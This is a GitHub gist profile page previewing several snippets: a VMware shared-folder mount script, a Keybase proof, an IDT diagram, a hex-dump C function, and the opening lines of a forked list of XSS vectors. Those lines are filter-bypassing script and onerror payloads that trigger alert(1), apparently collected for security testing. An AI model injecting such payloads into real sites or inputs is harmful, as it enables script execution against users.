Skip to content

Instantly share code, notes, and snippets.

View nonetype's full-sized avatar
🚀

Wonyoung Jung nonetype

🚀
View GitHub Profile
@nonetype
nonetype / mount-shared-folders.sh
Created July 12, 2021 09:25 — forked from mgeeky/mount-shared-folders.sh
VMware mount shared folders (taken from Kali)
#!/bin/bash
vmware-hgfsclient | while read folder; do
echo "[i] Mounting ${folder} (/mnt/hgfs/${folder})"
mkdir -p "/mnt/hgfs/${folder}"
umount -f "/mnt/hgfs/${folder}" 2>/dev/null
vmhgfs-fuse -o allow_other -o auto_unmount ".host:/${folder}" "/mnt/hgfs/${folder}"
done
sleep 2s
### Keybase proof
I hereby claim:
* I am nonetype on github.
* I am n0netype (https://keybase.io/n0netype) on keybase.
* I have a public key ASA2FRE3-i8fep_QyweLO9mF_AUltFu4Q-bwhPltIa0ZqQo
To claim this, I am signing this object:
INTERRUPT DESCRIPTOR TABLE
+------+-----+-----+------+
+---->| | | | |
| |- GATE FOR INTERRUPT #N -|
| | | | | |
| +------+-----+-----+------+
| * *
| * *
| * *
| +------+-----+-----+------+
@nonetype
nonetype / Testgist.py
Created February 28, 2020 09:47
for Gist Test
print("Hello World!")
@nonetype
nonetype / 666_lines_of_XSS_vectors.html
Created November 27, 2017 23:34 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@nonetype
nonetype / hex_dump.c
Created August 25, 2017 04:14 — forked from domnikl/LICENSE
C function to dump memory
void hexDump(char *desc, void *addr, int len)
{
int i;
unsigned char buff[17];
unsigned char *pc = (unsigned char*)addr;
// Output description if given.
if (desc != NULL)
printf ("%s:\n", desc);